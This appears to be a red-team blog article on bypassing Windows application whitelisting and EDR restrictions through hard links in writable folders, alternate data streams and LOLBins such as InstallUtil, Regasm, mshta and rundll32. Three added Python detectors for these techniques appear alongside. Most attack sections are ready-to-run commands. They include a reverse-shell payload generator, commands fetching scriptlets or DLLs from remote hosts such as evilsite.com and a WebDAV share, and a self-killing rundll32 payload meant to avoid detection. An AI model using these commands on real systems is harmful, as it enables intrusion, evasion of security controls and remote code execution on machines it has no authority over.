handy techniques to bypass environment restrictions

During a red teaming assessment you may run into restrictions imposed by policy enforcement, EDR, application whitelisting and the like. In this article I am going to cover most of the techniques that may be useful for bypassing such environment restrictions.

abusing writable paths

On some Windows 10 builds there are writable folder paths whose ownership (ACL) can be changed for the desired location, including execute rights. If execution of binaries is denied through inherited permissions, you can either disable inheritance or use a hard link to the binary:

fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe 

mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe

I also highly recommend checking for writable folders at the current permission level using the 0xsp mongoose -W option.
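As an added, defender-side example (my own code, not part of this article and not the mongoose tool), the following Python script performs the audit that a writable-folder sweep is meant for: it walks a directory tree, reports folders the current user can write to, and groups regular files that share a (device, inode) pair, so a hard link planted in a writable folder shows up next to the file it is another name for. It uses only the standard library; the sample tree it builds in a temporary directory is constructed for the demo, and os.access is only an approximation of the effective ACL.

```python
import os
import stat
import tempfile
from pathlib import Path


def writable_dirs(root: str) -> list[str]:
    """Directories under root the current user can write to.

    os.access reflects the effective permission as the OS reports it, which on
    Windows is an approximation of the full ACL (assumption for this demo).
    """
    found = []
    for dirpath, _, _ in os.walk(root):
        if os.access(dirpath, os.W_OK):
            found.append(dirpath)
    return sorted(found)


def hardlink_groups(root: str) -> list[list[str]]:
    """Group regular files with more than one hard link by (device, inode).

    A hard link placed in a writable folder is just another directory entry for a
    file that lives elsewhere, so every group lists all names the walk found for
    one underlying file.
    """
    groups: dict[tuple[int, int], list[str]] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:
                continue  # entry vanished or is unreadable; skip rather than abort the audit
            if stat.S_ISREG(st.st_mode) and st.st_nlink > 1:
                groups.setdefault((st.st_dev, st.st_ino), []).append(path)
    return sorted(sorted(group) for group in groups.values())


def build_demo_tree(base: str) -> dict[str, str]:
    """Constructed sample layout (a demo assumption, not a real system path):

      base/origin/tool.exe        the original file
      base/dropzone/linked.exe    hard link to tool.exe, the pattern the fsutil/mklink step creates
      base/locked/                folder with write permission removed for the owner
    """
    origin, dropzone, locked = (Path(base) / name for name in ("origin", "dropzone", "locked"))
    for directory in (origin, dropzone, locked):
        directory.mkdir(parents=True, exist_ok=True)
    target = origin / "tool.exe"
    target.write_bytes(b"MZ constructed sample, not a real binary")
    link = dropzone / "linked.exe"
    os.link(target, link)
    os.chmod(locked, stat.S_IRUSR | stat.S_IXUSR)
    return {"target": str(target), "link": str(link), "locked": str(locked)}


def demo() -> dict:
    """Run both checks against the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as base:
        paths = build_demo_tree(base)
        writable = writable_dirs(base)
        groups = hardlink_groups(base)
        os.chmod(paths["locked"], stat.S_IRWXU)  # restore so the temp dir is removed cleanly
    return {
        "writable": writable,
        "hardlinks": groups,
        "dropzone_writable": str(Path(paths["link"]).parent) in writable,
        "link_pair_found": sorted([paths["link"], paths["target"]]) in groups,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Pointing `writable_dirs` and `hardlink_groups` at a system directory instead of the temp tree gives the real audit; the inode grouping is what tells a linked copy apart from a genuinely dropped file, since a dropped file has a link count of one.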

Bypassing Application Whitelisting

Alternate Data Streams (AppLocker)

After AppLocker is installed on a Windows machine, the first user who logs in gets full access to the file locations below.

These files can be abused through alternate data stream execution, since AppLocker itself locks them. Execute the following steps:

  • adding the binary into the stream
type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe
  • calling wmic to create the process
wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'

You may also consider the following commands, which follow the same attack methodology:

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o

powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"

curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns
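Added detection example (my own Python, not code from this article): the common thread in every command above is an NTFS stream reference of the form path:stream on the command line, so a process-creation log can be triaged by parsing for that syntax. The parser has to distinguish the drive-letter colon in C:\... from the stream colon, skip URL schemes such as file:// and https://, and ignore colon-separated values like a time of day; it also catches the PowerShell -Stream parameter, which names the stream separately. The event fields (image, cmdline) follow the Sysmon/4688 style and the events are constructed from the article's commands plus two benign baselines.

```python
import ntpath
import re

# <path>:<stream>[:$DATA]. The path may begin with a drive letter and its own
# colon; the stream name may not contain a separator or another colon.
ADS_TOKEN = re.compile(
    r"^(?P<path>(?:[A-Za-z]:)?[^:\s\"']+):(?P<stream>[^:\s\\/\"']+)(?::\$DATA)?$"
)
URL_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")            # file://, https:// are not streams
POWERSHELL_STREAM = re.compile(r"-Stream\s+([^\s)}\"']+)", re.I)     # Set-Content ... -Stream <name>

# Binaries the article shows writing into a stream, or launching from one.
STREAM_WRITERS = {"cmd", "type", "extrac32", "esentutl", "powershell", "curl", "makecab"}
STREAM_LAUNCHERS = {"wmic"}


def find_ads_refs(cmdline: str) -> list[tuple[str, str]]:
    """Return (path, stream) pairs referenced on a command line.

    Tokenisation is whitespace based, which is enough for these samples; quoted
    paths containing spaces would need a Windows-aware splitter.
    """
    refs = []
    for token in cmdline.split():
        token = token.strip("'\"")
        if URL_SCHEME.match(token):
            continue
        m = ADS_TOKEN.match(token)
        if not m:
            continue
        path = m.group("path")
        # Require something path-like before the colon so values such as 12:30 are ignored.
        if not any(ch in path for ch in "\\/."):
            continue
        refs.append((path, m.group("stream")))
    m = POWERSHELL_STREAM.search(cmdline)
    if m:
        refs.append(("<Set-Content target>", m.group(1)))
    return refs


def triage(events: list[dict]) -> list[dict]:
    """Flag process-creation events whose command line touches a named stream."""
    alerts = []
    for event in events:
        refs = find_ads_refs(event["cmdline"])
        if not refs:
            continue
        binary = ntpath.splitext(ntpath.basename(event["image"]))[0].lower()
        if binary in STREAM_LAUNCHERS:
            phase = "execute-from-stream"
        elif binary in STREAM_WRITERS:
            phase = "write-to-stream"
        else:
            phase = "unclassified-stream-access"
        alerts.append({"image": binary, "phase": phase, "streams": refs})
    return alerts


# Constructed sample events, modelled on the article's commands; the last two are benign.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'"},
    {"image": r"C:\Windows\System32\extrac32.exe",
     "cmdline": r"extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe"},
    {"image": r"C:\Windows\System32\esentutl.exe",
     "cmdline": r"esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -command "& {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"'},
    {"image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe"},
    {"image": r"C:\Windows\System32\makecab.exe",
     "cmdline": r"makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns"},
    {"image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl https://example.com/report.csv --output C:\Users\alice\report.csv"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo done > C:\temp\notes.txt"},
]


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The phase label separates the staging step (a LOLBin writing bytes into a stream) from the execution step (wmic starting a process from one); both are worth alerting on, and a file-system side check with `dir /r` or `Get-Item -Stream *` on the flagged path confirms whether the stream is still present.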

Installutil.exe (T1118)

InstallUtil is a command-line utility that allows installation and uninstallation of resources by executing specific installer components specified in .NET binaries (Citation: MSDN InstallUtil). InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe

We can use this tool to generate a C# source file carrying the shellcode, then upload the generated file to the target machine:

python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windows/shell_reverse_tcp --lhost --lport 443

Compile the C# code using csc.exe:

csc.exe temp.cs

Finally, execute the payload with the following command:

.\InstallUtil.exe /logfile= /LogToConsole=false /U temp.cs

Presentationhost.exe (T1218)

PresentationHost.exe is a built-in Windows executable used for proxy execution of code through XAML Browser Applications, by loading an .xbap file into a specific process. Opening a .xbap file appears to launch the application inside Internet Explorer, but the code actually runs in another process (PresentationHost.exe). For a PoC demonstration you may use the following code:

private void Button_Click(object sender, RoutedEventArgs e)
{
    if (RadioButton1.IsChecked == true)
    {
        // body not shown in the original snippet
    }
}

Then you can execute the following payload:

Presentationhost.exe file:///tmp/poc.xbap

Also take into consideration that if it doesn't work because of security validation, it is better to build it through Visual Studio; you can check out this article.

Regsvcs.exe / Regasm (T1121)

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies.

Demonstration of this attack by executing the following commands:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}

You may also achieve that by executing the following PowerShell command lines:

$key = '<BASE64_STRONG_NAME_KEY_PLACEHOLDER>'
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library /keyfile:$env:Temp\key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}

Mshta.exe (T1170)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications).

From different angles we can use this utility to launch different kinds of attacks that bypass restrictions made in an environment; the first common one is using a scriptlet (.sct) file.

Let us first generate the payload to use:

<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    }
</script>
</scriptlet>

Then save it as payload.sct, for example; after that you can simply call it through the mshta process:

mshta.exe javascript:a=(GetObject("script:")).Exec();close();


As is well known, this can be used in different ways. The first command uses a DLL with a standard UNC path; in this case we are using rundll32 to execute a payload stored on a WebDAV server:

rundll32 \\webdavserver\folder\payload.dll,entrypoint

The other payload is an inline script that also uses the payload.sct from before:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

We can also consider using this tricky payload to execute a process and then kill the rundll32.exe process after the final execution, which is very helpful for avoiding detection in some cases:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

On the other hand, we can still use rundll32 to bypass the restriction by creating a process through the entry points of registered system DLLs:

rundll32.exe advpack.dll,RegisterOCX calc.exe

rundll32.exe zipfldr.dll,RouteTheCall calc.exe

rundll32.exe url.dll,OpenURL "C:\test\calc.hta"

rundll32.exe url.dll, FileProtocolHandler calc.exe

rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"

rundll32.exe ieadvpack.dll,LaunchINFSection test.i
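Added detection example for the proxy-execution sections above (mshta, rundll32, InstallUtil, Regasm/Regsvcs and PresentationHost); this is my own Python, not code from the article. Each rule keys on the visible artefact the technique leaves in a process-creation command line: a javascript: argument or the mshtml,RunHTMLApplication target for rundll32, a DLL loaded from a UNC path, the advpack/zipfldr/url/ieframe/ieadvpack export pairs listed above, a scriptlet reference for mshta, the /U uninstall switch with /LogToConsole=false for InstallUtil, /U or an assembly staged under a user-writable path for Regasm/Regsvcs, and an .xbap argument for PresentationHost. The user-writable-path heuristic and the sample command lines (including the test.inf file name and the alice user) are constructed assumptions; two benign baselines are included to show the rules stay quiet on normal use.

```python
import ntpath
import re

# dll/export pairs the article lists as rundll32 process-creation primitives (lower-cased)
RUNDLL32_EXPORTS = {
    ("advpack.dll", "registerocx"),
    ("zipfldr.dll", "routethecall"),
    ("url.dll", "openurl"),
    ("url.dll", "fileprotocolhandler"),
    ("ieframe.dll", "openurl"),
    ("ieadvpack.dll", "launchinfsection"),
}
RUNDLL32_TARGET = re.compile(r'^"?(?P<dll>[^\s,"]+)"?\s*,\s*(?P<export>\w+)')
SWITCH_U = re.compile(r"(^|\s)/u(\s|$)")
SCRIPTLET_REF = re.compile(r"(?<![a-z])script:|\.sct")
# Assumption: assemblies registered from these locations were staged by a user, not an installer.
USER_WRITABLE_PATH = re.compile(r"\\(temp|users|programdata|tmp)\\")


def split_image(cmdline: str) -> tuple[str, str]:
    """Return (program name without extension, remaining arguments) using Windows path rules."""
    parts = cmdline.split(None, 1)
    if not parts:
        return "", ""
    image = ntpath.splitext(ntpath.basename(parts[0].strip('"')))[0].lower()
    rest = parts[1].strip() if len(parts) > 1 else ""
    return image, rest


def classify(cmdline: str) -> list[str]:
    """Return the rule names a command line trips; an empty list means nothing matched."""
    image, rest = split_image(cmdline)
    low = rest.lower()
    hits = []
    if image == "rundll32":
        if low.startswith("javascript:"):
            hits.append("rundll32_inline_javascript")
        if "mshtml" in low and "runhtmlapplication" in low:
            hits.append("rundll32_mshtml_runhtmlapplication")
        if rest.startswith("\\\\"):
            hits.append("rundll32_unc_dll_load")
        m = RUNDLL32_TARGET.match(rest)
        if m:
            pair = (ntpath.basename(m.group("dll")).lower(), m.group("export").lower())
            if pair in RUNDLL32_EXPORTS:
                hits.append("rundll32_export_" + pair[1])
        if "taskkill" in low and "rundll32" in low:
            hits.append("rundll32_self_kill")
    elif image == "mshta":
        if low.startswith("javascript:") or low.startswith("vbscript:"):
            hits.append("mshta_inline_script")
        if SCRIPTLET_REF.search(low):
            hits.append("mshta_scriptlet_reference")
    elif image == "installutil":
        if SWITCH_U.search(low):
            hits.append("installutil_uninstall_switch")
        if "/logtoconsole=false" in low:
            hits.append("installutil_logging_disabled")
    elif image in ("regasm", "regsvcs"):
        if SWITCH_U.search(low):
            hits.append(image + "_uninstall_switch")
        if USER_WRITABLE_PATH.search(low):
            hits.append(image + "_assembly_from_user_path")
    elif image == "presentationhost":
        if ".xbap" in low:
            hits.append("presentationhost_xbap_launch")
    return hits


def triage(cmdlines: list[str]) -> list[tuple[str, list[str]]]:
    """Keep only the command lines that trip at least one rule, with their rule names."""
    results = []
    for cmdline in cmdlines:
        hits = classify(cmdline)
        if hits:
            results.append((cmdline, hits))
    return results


# Constructed samples built from the article's commands; the last two are benign baselines.
SAMPLE_CMDLINES = [
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();',
    r"rundll32 \\webdavserver\folder\payload.dll,entrypoint",
    r"rundll32.exe advpack.dll,RegisterOCX calc.exe",
    r"rundll32.exe url.dll, FileProtocolHandler calc.exe",
    r"rundll32.exe ieadvpack.dll,LaunchINFSection test.inf",
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);',
    r'mshta.exe javascript:a=(GetObject("script:http://webserver/payload.sct")).Exec();close();',
    r".\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\alice\AppData\Local\Temp\temp.exe",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\Users\alice\AppData\Local\Temp\out.dll",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe C:\Users\alice\AppData\Local\Temp\out.dll",
    r"Presentationhost.exe file:///tmp/poc.xbap",
    r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Program Files\Vendor\component.dll",
]


if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_CMDLINES):
        print(hits, "<-", cmdline)
```

The split on the first whitespace means a quoted image path containing spaces needs a Windows-aware argument splitter before the rules run; the rules themselves only depend on the argument string, so they carry over unchanged to Sysmon EventID 1 or Security 4688 data once CommandLine is extracted.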